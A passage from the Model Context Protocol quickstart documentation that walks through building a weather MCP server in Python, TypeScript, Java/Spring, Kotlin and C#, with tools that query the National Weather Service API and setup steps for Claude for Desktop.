uv venv
source .venv/bin/activate
# Install dependencies
uv add "mcp[cli]" httpx
# Create our server file
touch weather.py
```
```powershell Windows theme={null}
# Create a new directory for our project
uv init weather
cd weather
# Create virtual environment and activate it
uv venv
.venv\Scripts\activate
# Install dependencies
uv add mcp[cli] httpx
# Create our server file
new-item weather.py
```
Now let's dive into building your server.
## Building your server
### Importing packages and setting up the instance
Add these to the top of your `weather.py`:
```python theme={null}
from typing import Any
import httpx
from mcp.server.fastmcp import FastMCP
# Initialize FastMCP server
mcp = FastMCP("weather")
# Constants
NWS_API_BASE = "https://api.weather.gov"
USER_AGENT = "weather-app/1.0"
```
The FastMCP class uses Python type hints and docstrings to automatically generate tool definitions, making it easy to create and maintain MCP tools.
### Helper functions
Next, let's add our helper functions for querying and formatting the data from the National Weather Service API:
```python theme={null}
async def make_nws_request(url: str) -> dict[str, Any] | None:
"""Make a request to the NWS API with proper error handling."""
headers = {"User-Agent": USER_AGENT, "Accept": "application/geo+json"}
async with httpx.AsyncClient() as client:
try:
response = await client.get(url, headers=headers, timeout=30.0)
response.raise_for_status()
return response.json()
except Exception:
return None
def format_alert(feature: dict) -> str:
"""Format an alert feature into a readable string."""
props = feature["properties"]
return f"""
Event: {props.get("event", "Unknown")}
Area: {props.get("areaDesc", "Unknown")}
Severity: {props.get("severity", "Unknown")}
Description: {props.get("description", "No description available")}
Instructions: {props.get("instruction", "No specific instructions provided")}
"""
```
### Implementing tool execution
The tool execution handler is responsible for actually executing the logic of each tool. Let's add it:
```python theme={null}
@mcp.tool()
async def get_alerts(state: str) -> str:
"""Get weather alerts for a US state.
Args:
state: Two-letter US state code (e.g. CA, NY)
"""
url = f"{NWS_API_BASE}/alerts/active/area/{state}"
data = await make_nws_request(url)
if not data or "features" not in data:
return "Unable to fetch alerts or no alerts found."
if not data["features"]:
return "No active alerts for this state."
alerts = [format_alert(feature) for feature in data["features"]]
return "\n---\n".join(alerts)
@mcp.tool()
async def get_forecast(latitude: float, longitude: float) -> str:
"""Get weather forecast for a location.
Args:
latitude: Latitude of the location
longitude: Longitude of the location
"""
# First get the forecast grid endpoint
points_url = f"{NWS_API_BASE}/points/{latitude},{longitude}"
points_data = await make_nws_request(points_url)
if not points_data:
return "Unable to fetch forecast data for this location."
# Get the forecast URL from the points response
forecast_url = points_data["properties"]["forecast"]
forecast_data = await make_nws_request(forecast_url)
if not forecast_data:
return "Unable to fetch detailed forecast."
# Format the periods into a readable forecast
periods = forecast_data["properties"]["periods"]
forecasts = []
for period in periods[:5]: # Only show next 5 periods
forecast = f"""
{period["name"]}:
Temperature: {period["temperature"]}°{period["temperatureUnit"]}
Wind: {period["windSpeed"]} {period["windDirection"]}
Forecast: {period["detailedForecast"]}
"""
forecasts.append(forecast)
return "\n---\n".join(forecasts)
```
### Running the server
Finally, let's initialize and run the server:
```python theme={null}
def main():
# Initialize and run the server
mcp.run(transport="stdio")
if __name__ == "__main__":
main()
```
Your server is complete! Run `uv run weather.py` to start the MCP server, which will listen for messages from MCP hosts.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "uv",
"args": [
"--directory",
"/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather",
"run",
"weather.py"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "uv",
"args": [
"--directory",
"C:\\ABSOLUTE\\PATH\\TO\\PARENT\\FOLDER\\weather",
"run",
"weather.py"
]
}
}
}
```
You may need to put the full path to the `uv` executable in the `command` field. You can get this by running `which uv` on macOS/Linux or `where uv` on Windows.
Make sure you pass in the absolute path to your server. You can get this by running `pwd` on macOS/Linux or `cd` on Windows Command Prompt. On Windows, remember to use double backslashes (`\\`) or forward slashes (`/`) in the JSON path.
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. To launch it by running `uv --directory /ABSOLUTE/PATH/TO/PARENT/FOLDER/weather run weather.py`
Save the file, and restart **Claude for Desktop**.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-typescript)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* TypeScript
* LLMs like Claude
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files, such as `logging` in Python.
2. For JavaScript, be especially careful - `console.log()` writes to stdout by default
### Quick Examples
```javascript theme={null}
// ❌ Bad (STDIO)
console.log("Server started");
// ✅ Good (STDIO)
console.error("Server started"); // stderr is safe
```
### System requirements
For TypeScript, make sure you have the latest version of Node installed.
### Set up your environment
First, let's install Node.js and npm if you haven't already. You can download them from [nodejs.org](https://nodejs.org/).
Verify your Node.js installation:
```bash theme={null}
node --version
npm --version
```
For this tutorial, you'll need Node.js version 16 or higher.
Now, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new npm project
npm init -y
# Install dependencies
npm install @modelcontextprotocol/sdk zod@3
npm install -D @types/node typescript
# Create our files
mkdir src
touch src/index.ts
```
```powershell Windows theme={null}
# Create a new directory for our project
md weather
cd weather
# Initialize a new npm project
npm init -y
# Install dependencies
npm install @modelcontextprotocol/sdk zod@3
npm install -D @types/node typescript
# Create our files
md src
new-item src\index.ts
```
Update your package.json to add type: "module" and a build script:
```json package.json theme={null}
{
"type": "module",
"bin": {
"weather": "./build/index.js"
},
"scripts": {
"build": "tsc && chmod 755 build/index.js"
},
"files": ["build"]
}
```
Create a `tsconfig.json` in the root of your project:
```json tsconfig.json theme={null}
{
"compilerOptions": {
"target": "ES2022",
"module": "Node16",
"moduleResolution": "Node16",
"outDir": "./build",
"rootDir": "./src",
"strict": true,
"esModuleInterop": true,
"skipLibCheck": true,
"forceConsistentCasingInFileNames": true
},
"include": ["src/**/*"],
"exclude": ["node_modules"]
}
```
Now let's dive into building your server.
## Building your server
### Importing packages and setting up the instance
Add these to the top of your `src/index.ts`:
```typescript theme={null}
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
import { z } from "zod";
const NWS_API_BASE = "https://api.weather.gov";
const USER_AGENT = "weather-app/1.0";
// Create server instance
const server = new McpServer({
name: "weather",
version: "1.0.0",
});
```
### Helper functions
Next, let's add our helper functions for querying and formatting the data from the National Weather Service API:
```typescript theme={null}
// Helper function for making NWS API requests
async function makeNWSRequest(url: string): Promise {
const headers = {
"User-Agent": USER_AGENT,
Accept: "application/geo+json",
};
try {
const response = await fetch(url, { headers });
if (!response.ok) {
throw new Error(`HTTP error! status: ${response.status}`);
}
return (await response.json()) as T;
} catch (error) {
console.error("Error making NWS request:", error);
return null;
}
}
interface AlertFeature {
properties: {
event?: string;
areaDesc?: string;
severity?: string;
status?: string;
headline?: string;
};
}
// Format alert data
function formatAlert(feature: AlertFeature): string {
const props = feature.properties;
return [
`Event: ${props.event || "Unknown"}`,
`Area: ${props.areaDesc || "Unknown"}`,
`Severity: ${props.severity || "Unknown"}`,
`Status: ${props.status || "Unknown"}`,
`Headline: ${props.headline || "No headline"}`,
"---",
].join("\n");
}
interface ForecastPeriod {
name?: string;
temperature?: number;
temperatureUnit?: string;
windSpeed?: string;
windDirection?: string;
shortForecast?: string;
}
interface AlertsResponse {
features: AlertFeature[];
}
interface PointsResponse {
properties: {
forecast?: string;
};
}
interface ForecastResponse {
properties: {
periods: ForecastPeriod[];
};
}
```
### Implementing tool execution
The tool execution handler is responsible for actually executing the logic of each tool. Let's add it:
```typescript theme={null}
// Register weather tools
server.registerTool(
"get_alerts",
{
description: "Get weather alerts for a state",
inputSchema: {
state: z
.string()
.length(2)
.describe("Two-letter state code (e.g. CA, NY)"),
},
},
async ({ state }) => {
const stateCode = state.toUpperCase();
const alertsUrl = `${NWS_API_BASE}/alerts?area=${stateCode}`;
const alertsData = await makeNWSRequest(alertsUrl);
if (!alertsData) {
return {
content: [
{
type: "text",
text: "Failed to retrieve alerts data",
},
],
};
}
const features = alertsData.features || [];
if (features.length === 0) {
return {
content: [
{
type: "text",
text: `No active alerts for ${stateCode}`,
},
],
};
}
const formattedAlerts = features.map(formatAlert);
const alertsText = `Active alerts for ${stateCode}:\n\n${formattedAlerts.join("\n")}`;
return {
content: [
{
type: "text",
text: alertsText,
},
],
};
},
);
server.registerTool(
"get_forecast",
{
description: "Get weather forecast for a location",
inputSchema: {
latitude: z
.number()
.min(-90)
.max(90)
.describe("Latitude of the location"),
longitude: z
.number()
.min(-180)
.max(180)
.describe("Longitude of the location"),
},
},
async ({ latitude, longitude }) => {
// Get grid point data
const pointsUrl = `${NWS_API_BASE}/points/${latitude.toFixed(4)},${longitude.toFixed(4)}`;
const pointsData = await makeNWSRequest(pointsUrl);
if (!pointsData) {
return {
content: [
{
type: "text",
text: `Failed to retrieve grid point data for coordinates: ${latitude}, ${longitude}. This location may not be supported by the NWS API (only US locations are supported).`,
},
],
};
}
const forecastUrl = pointsData.properties?.forecast;
if (!forecastUrl) {
return {
content: [
{
type: "text",
text: "Failed to get forecast URL from grid point data",
},
],
};
}
// Get forecast data
const forecastData = await makeNWSRequest(forecastUrl);
if (!forecastData) {
return {
content: [
{
type: "text",
text: "Failed to retrieve forecast data",
},
],
};
}
const periods = forecastData.properties?.periods || [];
if (periods.length === 0) {
return {
content: [
{
type: "text",
text: "No forecast periods available",
},
],
};
}
// Format forecast periods
const formattedForecast = periods.map((period: ForecastPeriod) =>
[
`${period.name || "Unknown"}:`,
`Temperature: ${period.temperature || "Unknown"}°${period.temperatureUnit || "F"}`,
`Wind: ${period.windSpeed || "Unknown"} ${period.windDirection || ""}`,
`${period.shortForecast || "No forecast available"}`,
"---",
].join("\n"),
);
const forecastText = `Forecast for ${latitude}, ${longitude}:\n\n${formattedForecast.join("\n")}`;
return {
content: [
{
type: "text",
text: forecastText,
},
],
};
},
);
```
### Running the server
Finally, implement the main function to run the server:
```typescript theme={null}
async function main() {
const transport = new StdioServerTransport();
await server.connect(transport);
console.error("Weather MCP Server running on stdio");
}
main().catch((error) => {
console.error("Fatal error in main():", error);
process.exit(1);
});
```
Make sure to run `npm run build` to build your server! This is a very important step in getting your server to connect.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "node",
"args": ["/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/index.js"]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "node",
"args": ["C:\\PATH\\TO\\PARENT\\FOLDER\\weather\\build\\index.js"]
}
}
}
```
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running `node /ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/index.js`
Save the file, and restart **Claude for Desktop**.
This is a quickstart demo based on Spring AI MCP auto-configuration and boot starters.
To learn how to create sync and async MCP Servers, manually, consult the [Java SDK Server](/sdk/java/mcp-server) documentation.
Let's get started with building our weather server!
[You can find the complete code for what we'll be building here.](https://github.com/spring-projects/spring-ai-examples/tree/main/model-context-protocol/weather/starter-stdio-server)
For more information, see the [MCP Server Boot Starter](https://docs.spring.io/spring-ai/reference/api/mcp/mcp-server-boot-starter-docs.html) reference documentation.
For manual MCP Server implementation, refer to the [MCP Server Java SDK documentation](/sdk/java/mcp-server).
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files.
2. Ensure any configured logging library will not write to STDOUT
### System requirements
* Java 17 or higher installed.
* [Spring Boot 3.3.x](https://docs.spring.io/spring-boot/installing.html) or higher
### Set up your environment
Use the [Spring Initializer](https://start.spring.io/) to bootstrap the project.
You will need to add the following dependencies:
```xml Maven theme={null}
org.springframework.aispring-ai-starter-mcp-serverorg.springframeworkspring-web
```
```groovy Gradle theme={null}
dependencies {
implementation platform("org.springframework.ai:spring-ai-starter-mcp-server")
implementation platform("org.springframework:spring-web")
}
```
Then configure your application by setting the application properties:
```bash application.properties theme={null}
spring.main.bannerMode=off
logging.pattern.console=
```
```yaml application.yml theme={null}
logging:
pattern:
console:
spring:
main:
banner-mode: off
```
The [Server Configuration Properties](https://docs.spring.io/spring-ai/reference/api/mcp/mcp-server-boot-starter-docs.html#_configuration_properties) documents all available properties.
Now let's dive into building your server.
## Building your server
### Weather Service
Let's implement a [WeatherService.java](https://github.com/spring-projects/spring-ai-examples/blob/main/model-context-protocol/weather/starter-stdio-server/src/main/java/org/springframework/ai/mcp/sample/server/WeatherService.java) that uses a REST client to query the data from the National Weather Service API:
```java theme={null}
@Service
public class WeatherService {
private final RestClient restClient;
public WeatherService() {
this.restClient = RestClient.builder()
.baseUrl("https://api.weather.gov")
.defaultHeader("Accept", "application/geo+json")
.defaultHeader("User-Agent", "WeatherApiClient/1.0 (your@email.com)")
.build();
}
@Tool(description = "Get weather forecast for a specific latitude/longitude")
public String getWeatherForecastByLocation(
double latitude, // Latitude coordinate
double longitude // Longitude coordinate
) {
// Returns detailed forecast including:
// - Temperature and unit
// - Wind speed and direction
// - Detailed forecast description
}
@Tool(description = "Get weather alerts for a US state")
public String getAlerts(
@ToolParam(description = "Two-letter US state code (e.g. CA, NY)") String state
) {
// Returns active alerts including:
// - Event type
// - Affected area
// - Severity
// - Description
// - Safety instructions
}
// ......
}
```
The `@Service` annotation with auto-register the service in your application context.
The Spring AI `@Tool` annotation, making it easy to create and maintain MCP tools.
The auto-configuration will automatically register these tools with the MCP server.
### Create your Boot Application
```java theme={null}
@SpringBootApplication
public class McpServerApplication {
public static void main(String[] args) {
SpringApplication.run(McpServerApplication.class, args);
}
@Bean
public ToolCallbackProvider weatherTools(WeatherService weatherService) {
return MethodToolCallbackProvider.builder().toolObjects(weatherService).build();
}
}
```
Uses the `MethodToolCallbackProvider` utils to convert the `@Tools` into actionable callbacks used by the MCP server.
### Running the server
Finally, let's build the server:
```bash theme={null}
./mvnw clean install
```
This will generate an `mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar` file within the `target` folder.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux.
First, make sure you have Claude for Desktop installed.
[You can install the latest version here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use.
To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor.
Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key.
The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"spring-ai-mcp-weather": {
"command": "java",
"args": [
"-Dspring.ai.mcp.server.stdio=true",
"-jar",
"/ABSOLUTE/PATH/TO/PARENT/FOLDER/mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"spring-ai-mcp-weather": {
"command": "java",
"args": [
"-Dspring.ai.mcp.server.transport=STDIO",
"-jar",
"C:\\ABSOLUTE\\PATH\\TO\\PARENT\\FOLDER\\weather\\mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar"
]
}
}
}
```
Make sure you pass in the absolute path to your server.
This tells Claude for Desktop:
1. There's an MCP server named "my-weather-server"
2. To launch it by running `java -jar /ABSOLUTE/PATH/TO/PARENT/FOLDER/mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar`
Save the file, and restart **Claude for Desktop**.
## Testing your server with Java client
### Create an MCP Client manually
Use the `McpClient` to connect to the server:
```java theme={null}
var stdioParams = ServerParameters.builder("java")
.args("-jar", "/ABSOLUTE/PATH/TO/PARENT/FOLDER/mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar")
.build();
var stdioTransport = new StdioClientTransport(stdioParams);
var mcpClient = McpClient.sync(stdioTransport).build();
mcpClient.initialize();
ListToolsResult toolsList = mcpClient.listTools();
CallToolResult weather = mcpClient.callTool(
new CallToolRequest("getWeatherForecastByLocation",
Map.of("latitude", "47.6062", "longitude", "-122.3321")));
CallToolResult alert = mcpClient.callTool(
new CallToolRequest("getAlerts", Map.of("state", "NY")));
mcpClient.closeGracefully();
```
### Use MCP Client Boot Starter
Create a new boot starter application using the `spring-ai-starter-mcp-client` dependency:
```xml theme={null}
org.springframework.aispring-ai-starter-mcp-client
```
and set the `spring.ai.mcp.client.stdio.servers-configuration` property to point to your `claude_desktop_config.json`.
You can reuse the existing Anthropic Desktop configuration:
```properties theme={null}
spring.ai.mcp.client.stdio.servers-configuration=file:PATH/TO/claude_desktop_config.json
```
When you start your client application, the auto-configuration will create, automatically MCP clients from the claude\_desktop\_config.json.
For more information, see the [MCP Client Boot Starters](https://docs.spring.io/spring-ai/reference/api/mcp/mcp-server-boot-client-docs.html) reference documentation.
## More Java MCP Server examples
The [starter-webflux-server](https://github.com/spring-projects/spring-ai-examples/tree/main/model-context-protocol/weather/starter-webflux-server) demonstrates how to create an MCP server using SSE transport.
It showcases how to define and register MCP Tools, Resources, and Prompts, using the Spring Boot's auto-configuration capabilities.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/kotlin-sdk/tree/main/samples/weather-stdio-server)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* Kotlin
* LLMs like Claude
### System requirements
* Java 17 or higher installed.
### Set up your environment
First, let's install `java` and `gradle` if you haven't already.
You can download `java` from [official Oracle JDK website](https://www.oracle.com/java/technologies/downloads/).
Verify your `java` installation:
```bash theme={null}
java --version
```
Now, let's create and set up your project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new kotlin project
gradle init
```
```powershell Windows theme={null}
# Create a new directory for our project
md weather
cd weather
# Initialize a new kotlin project
gradle init
```
After running `gradle init`, you will be presented with options for creating your project.
Select **Application** as the project type, **Kotlin** as the programming language, and **Java 17** as the Java version.
Alternatively, you can create a Kotlin application using the [IntelliJ IDEA project wizard](https://kotlinlang.org/docs/jvm-get-started.html).
After creating the project, add the following dependencies:
```kotlin build.gradle.kts theme={null}
val mcpVersion = "0.4.0"
val slf4jVersion = "2.0.9"
val ktorVersion = "3.1.1"
dependencies {
implementation("io.modelcontextprotocol:kotlin-sdk:$mcpVersion")
implementation("org.slf4j:slf4j-nop:$slf4jVersion")
implementation("io.ktor:ktor-client-content-negotiation:$ktorVersion")
implementation("io.ktor:ktor-serialization-kotlinx-json:$ktorVersion")
}
```
```groovy build.gradle theme={null}
def mcpVersion = '0.3.0'
def slf4jVersion = '2.0.9'
def ktorVersion = '3.1.1'
dependencies {
implementation "io.modelcontextprotocol:kotlin-sdk:$mcpVersion"
implementation "org.slf4j:slf4j-nop:$slf4jVersion"
implementation "io.ktor:ktor-client-content-negotiation:$ktorVersion"
implementation "io.ktor:ktor-serialization-kotlinx-json:$ktorVersion"
}
```
Also, add the following plugins to your build script:
```kotlin build.gradle.kts theme={null}
plugins {
kotlin("plugin.serialization") version "your_version_of_kotlin"
id("com.gradleup.shadow") version "8.3.9"
}
```
```groovy build.gradle theme={null}
plugins {
id 'org.jetbrains.kotlin.plugin.serialization' version 'your_version_of_kotlin'
id 'com.gradleup.shadow' version '8.3.9'
}
```
Now let’s dive into building your server.
## Building your server
### Setting up the instance
Add a server initialization function:
```kotlin theme={null}
// Main function to run the MCP server
fun `run mcp server`() {
// Create the MCP Server instance with a basic implementation
val server = Server(
Implementation(
name = "weather", // Tool name is "weather"
version = "1.0.0" // Version of the implementation
),
ServerOptions(
capabilities = ServerCapabilities(tools = ServerCapabilities.Tools(listChanged = true))
)
)
// Create a transport using standard IO for server communication
val transport = StdioServerTransport(
System.`in`.asInput(),
System.out.asSink().buffered()
)
runBlocking {
server.connect(transport)
val done = Job()
server.onClose {
done.complete()
}
done.join()
}
}
```
### Weather API helper functions
Next, let's add functions and data classes for querying and converting responses from the National Weather Service API:
```kotlin theme={null}
// Extension function to fetch forecast information for given latitude and longitude
suspend fun HttpClient.getForecast(latitude: Double, longitude: Double): List {
val points = this.get("/points/$latitude,$longitude").body()
val forecast = this.get(points.properties.forecast).body()
return forecast.properties.periods.map { period ->
"""
${period.name}:
Temperature: ${period.temperature} ${period.temperatureUnit}
Wind: ${period.windSpeed} ${period.windDirection}
Forecast: ${period.detailedForecast}
""".trimIndent()
}
}
// Extension function to fetch weather alerts for a given state
suspend fun HttpClient.getAlerts(state: String): List {
val alerts = this.get("/alerts/active/area/$state").body()
return alerts.features.map { feature ->
"""
Event: ${feature.properties.event}
Area: ${feature.properties.areaDesc}
Severity: ${feature.properties.severity}
Description: ${feature.properties.description}
Instruction: ${feature.properties.instruction}
""".trimIndent()
}
}
@Serializable
data class Points(
val properties: Properties
) {
@Serializable
data class Properties(val forecast: String)
}
@Serializable
data class Forecast(
val properties: Properties
) {
@Serializable
data class Properties(val periods: List)
@Serializable
data class Period(
val number: Int, val name: String, val startTime: String, val endTime: String,
val isDaytime: Boolean, val temperature: Int, val temperatureUnit: String,
val temperatureTrend: String, val probabilityOfPrecipitation: JsonObject,
val windSpeed: String, val windDirection: String,
val shortForecast: String, val detailedForecast: String,
)
}
@Serializable
data class Alert(
val features: List
) {
@Serializable
data class Feature(
val properties: Properties
)
@Serializable
data class Properties(
val event: String, val areaDesc: String, val severity: String,
val description: String, val instruction: String?,
)
}
```
### Implementing tool execution
The tool execution handler is responsible for actually executing the logic of each tool. Let's add it:
```kotlin theme={null}
// Create an HTTP client with a default request configuration and JSON content negotiation
val httpClient = HttpClient {
defaultRequest {
url("https://api.weather.gov")
headers {
append("Accept", "application/geo+json")
append("User-Agent", "WeatherApiClient/1.0")
}
contentType(ContentType.Application.Json)
}
// Install content negotiation plugin for JSON serialization/deserialization
install(ContentNegotiation) { json(Json { ignoreUnknownKeys = true }) }
}
// Register a tool to fetch weather alerts by state
server.addTool(
name = "get_alerts",
description = """
Get weather alerts for a US state. Input is Two-letter US state code (e.g. CA, NY)
""".trimIndent(),
inputSchema = Tool.Input(
properties = buildJsonObject {
putJsonObject("state") {
put("type", "string")
put("description", "Two-letter US state code (e.g. CA, NY)")
}
},
required = listOf("state")
)
) { request ->
val state = request.arguments["state"]?.jsonPrimitive?.content
if (state == null) {
return@addTool CallToolResult(
content = listOf(TextContent("The 'state' parameter is required."))
)
}
val alerts = httpClient.getAlerts(state)
CallToolResult(content = alerts.map { TextContent(it) })
}
// Register a tool to fetch weather forecast by latitude and longitude
server.addTool(
name = "get_forecast",
description = """
Get weather forecast for a specific latitude/longitude
""".trimIndent(),
inputSchema = Tool.Input(
properties = buildJsonObject {
putJsonObject("latitude") { put("type", "number") }
putJsonObject("longitude") { put("type", "number") }
},
required = listOf("latitude", "longitude")
)
) { request ->
val latitude = request.arguments["latitude"]?.jsonPrimitive?.doubleOrNull
val longitude = request.arguments["longitude"]?.jsonPrimitive?.doubleOrNull
if (latitude == null || longitude == null) {
return@addTool CallToolResult(
content = listOf(TextContent("The 'latitude' and 'longitude' parameters are required."))
)
}
val forecast = httpClient.getForecast(latitude, longitude)
CallToolResult(content = forecast.map { TextContent(it) })
}
```
### Running the server
Finally, implement the main function to run the server:
```kotlin theme={null}
fun main() = `run mcp server`()
```
Make sure to run `./gradlew build` to build your server. This is a very important step in getting your server to connect.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use.
To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor.
Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key.
The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "java",
"args": [
"-jar",
"/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/libs/weather-0.1.0-all.jar"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "java",
"args": [
"-jar",
"C:\\PATH\\TO\\PARENT\\FOLDER\\weather\\build\\libs\\weather-0.1.0-all.jar"
]
}
}
}
```
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running `java -jar /ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/libs/weather-0.1.0-all.jar`
Save the file, and restart **Claude for Desktop**.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/csharp-sdk/tree/main/samples/QuickstartWeatherServer)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* C#
* LLMs like Claude
* .NET 8 or higher
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files
### System requirements
* [.NET 8 SDK](https://dotnet.microsoft.com/download/dotnet/8.0) or higher installed.
### Set up your environment
First, let's install `dotnet` if you haven't already. You can download `dotnet` from [official Microsoft .NET website](https://dotnet.microsoft.com/download/). Verify your `dotnet` installation:
```bash theme={null}
dotnet --version
```
Now, let's create and set up your project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new C# project
dotnet new console
```
```powershell Windows theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new C# project
dotnet new console
```
After running `dotnet new console`, you will be presented with a new C# project.
You can open the project in your favorite IDE, such as [Visual Studio](https://visualstudio.microsoft.com/) or [Rider](https://www.jetbrains.com/rider/).
Alternatively, you can create a C# application using the [Visual Studio project wizard](https://learn.microsoft.com/en-us/visualstudio/get-started/csharp/tutorial-console?view=vs-2022).
After creating the project, add NuGet package for the Model Context Protocol SDK and hosting:
```bash theme={null}
# Add the Model Context Protocol SDK NuGet package
dotnet add package ModelContextProtocol --prerelease
# Add the .NET Hosting NuGet package
dotnet add package Microsoft.Extensions.Hosting
```
Now let’s dive into building your server.
## Building your server
Open the `Program.cs` file in your project and replace its contents with the following code:
```csharp theme={null}
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Hosting;
using ModelContextProtocol;
using System.Net.Http.Headers;
var builder = Host.CreateEmptyApplicationBuilder(settings: null);
builder.Services.AddMcpServer()
.WithStdioServerTransport()
.WithToolsFromAssembly();
builder.Services.AddSingleton(_ =>
{
var client = new HttpClient() { BaseAddress = new Uri("https://api.weather.gov") };
